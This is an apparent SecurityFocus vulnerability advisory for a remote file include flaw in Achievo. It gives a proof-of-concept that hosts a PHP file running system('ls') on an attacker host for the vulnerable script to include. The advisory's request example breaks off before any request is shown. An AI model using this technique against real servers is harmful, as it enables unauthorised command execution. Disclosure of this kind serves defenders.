Achievo Remote File Include Command Execution Vulnerability

The following example was submitted:

Create the following text file (ls.txt) and store it on the attacker host where it is publicly accessible:

<?php system('ls'); ?>

And cause the vulnerable script on the victim host to invoke it with the following request:



Privacy Statement
Copyright 2010, SecurityFocus